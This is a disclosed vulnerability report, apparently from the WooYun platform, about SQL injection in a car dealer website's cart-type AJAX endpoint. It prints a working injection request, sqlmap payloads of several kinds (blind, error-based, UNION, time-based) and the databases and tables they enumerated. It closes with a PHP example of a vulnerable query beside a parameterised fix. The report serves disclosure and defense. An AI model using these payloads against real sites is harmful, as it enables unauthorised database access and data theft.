WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader ------------------ http://drop.zone.ci/
2015-10-16: Details sent to the vendor, awaiting vendor handling
2015-10-20: Vendor has confirmed; details disclosed to the vendor only
2015-10-30: Details disclosed to core white hats and experts in related fields
2015-11-09: Details disclosed to regular white hats
2015-11-19: Details disclosed to intern white hats
2015-12-04: Details disclosed to the public
As stated in the title.
1. Injection point
POST /buy/ajax_cartype.php HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept: text/javascript, text/html, application/xml, text/xml, */*
Origin: http://**.**.**.**
Referer: http://**.**.**.**/buy/price.php
X-Prototype-Version: 1.5.0_rc0
X-Requested-With: XMLHttpRequest
Host: **.**.**.**
Cookie: PHPSESSID=um8dmjoj20r0okfh2hd9el5h52; flag_memberid=16951; flag_name=Smith
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

cartypeid=%27+OR+%27ns%27%3d%27ns&t=0.843157094437629&_=3
2. Databases involved:
Place: POST
Parameter: cartypeid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cartypeid=' OR 'ns'='ns' AND 3395=3395 AND 'anFf'='anFf&t=0.84315794437629&_=3

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cartypeid=' OR 'ns'='ns' AND (SELECT 6044 FROM(SELECT COUNT(*),CONCAT(0x3a6578653a,(SELECT (CASE WHEN (6044=6044) THEN 1 ELSE 0 END)),0x3a6f6b6d3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'JFg'='JFbg&t=0.843157094437629&_=3

    Type: UNION query
    Title: MySQL UNION query (NULL) - 64 columns
    Payload: cartypeid=' OR 'ns'='ns' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6578653a,0x5556477641614e505855,0x3a6f6b6d3a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#&t=0.843157094437629&_=3

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cartypeid=' OR 'ns'='ns' AND SLEEP(5) AND 'NuxO'='NuxO&t=0.84315704437629&_=3
---
available databases [4]:
[*] dealer
[*] information_schema
[*] news
[*] test
3. Tables
Database: dealer
[87 tables]
+----------------------+
| actions              |
| adminmanage          |
| carfield             |
| carinfo              |
| cars                 |
| cartype              |
| color_cars           |
| colors               |
| members              |
| news                 |
| news_cartype         |
| newstype             |
| recom                |
| setting              |
| siteinfo             |
| t_ad                 |
| t_ad1111             |
| t_admin              |
| t_article            |
| t_article11111       |
| t_car                |
| t_cars               |
| t_cars1111           |
| t_cou_50_ip_hits     |
| t_cou_50_ip_limit    |
| t_cou_adv            |
| t_cou_alexa          |
| t_cou_area           |
| t_cou_bot            |
| t_cou_browser        |
| t_cou_city           |
| t_cou_color          |
| t_cou_country        |
| t_cou_day_data       |
| t_cou_holiday        |
| t_cou_keyword        |
| t_cou_language       |
| t_cou_month_data     |
| t_cou_page           |
| t_cou_pagead         |
| t_cou_pagedepth      |
| t_cou_pageentry      |
| t_cou_plug           |
| t_cou_province       |
| t_cou_referer        |
| t_cou_returner       |
| t_cou_screen         |
| t_cou_similar        |
| t_cou_site           |
| t_cou_system         |
| t_cou_timelong       |
| t_cou_timezone       |
| t_cou_user_site      |
| t_cou_users          |
| t_cou_year_data      |
| t_dealer             |
| t_dealer1111         |
| t_dealer1112         |
| t_dealer_1108        |
| t_dealer_1109        |
| t_dealer_1115        |
| t_dealer_1116        |
| t_dealer_bak20120914 |
| t_gbook              |
| t_job                |
| t_link               |
| t_new_cars           |
| t_new_class          |
| t_new_event          |
| t_new_focus          |
| t_new_items          |
| t_new_message        |
| t_new_news           |
| t_new_newsclass      |
| t_new_reserve        |
| t_new_testdrive      |
| t_notice             |
| t_photo              |
| t_photo1111          |
| t_province_city      |
| t_refinement         |
| t_sessions           |
| t_sort               |
| t_sort_bak           |
| t_sort_rename        |
| t_user               |
| t_way                |
+----------------------+
As above.
Filter the input.
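One way to apply that fix inside the endpoint itself, as an added example that is not the site's own code: the report does not include the source of /buy/ajax_cartype.php, so the vulnerable pattern below is an assumed reconstruction of how a quoted cartypeid reaches the WHERE clause; the dealer database and cartype table come from the report, while the column names and the database account are assumptions.

```php
<?php
// Added example (not the site's code). Assumed: table `cartype` in database
// `dealer` has integer column `cartypeid` and a `name` column.

// ASSUMED vulnerable pattern: the raw POST value is spliced into the SQL
// string, so cartypeid=' OR 'ns'='ns turns the WHERE clause into a tautology
// and every further clause sqlmap appends is evaluated by MySQL.
function lookup_cartype_vulnerable(mysqli $db, string $cartypeid): ?array
{
    $sql = "SELECT cartypeid, name FROM cartype WHERE cartypeid = '" . $cartypeid . "'";
    $res = $db->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// Hardened form of the same lookup: validate the parameter as a positive
// integer (the "filter" step), then bind it as a typed parameter so the
// value is never parsed as SQL even if validation is later relaxed.
function lookup_cartype(mysqli $db, string $raw): ?array
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);   // "' OR 'ns'='ns" is rejected before any query
        return null;
    }
    $stmt = $db->prepare('SELECT cartypeid, name FROM cartype WHERE cartypeid = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // requires mysqlnd
    $stmt->close();
    return $row ?: null;
}

// Connect with a read-only account (assumed name) so that even a future
// injection elsewhere cannot modify or dump unrelated tables.
$db = new mysqli('localhost', 'dealer_ro', 'CHANGE_ME', 'dealer');
$db->set_charset('utf8mb4');

header('Content-Type: application/json');
echo json_encode(lookup_cartype($db, $_POST['cartypeid'] ?? ''));
```

Rejected requests should also be logged with the offending parameter value, since a burst of 400s on this endpoint from one session (the report's request carries a logged-in PHPSESSID) is the detection signal for a scanner such as the one identified in the User-Agent above.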
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-10-20 18:00
No direct handling channel with the organization that administers the site has been established yet; awaiting claim.
None yet.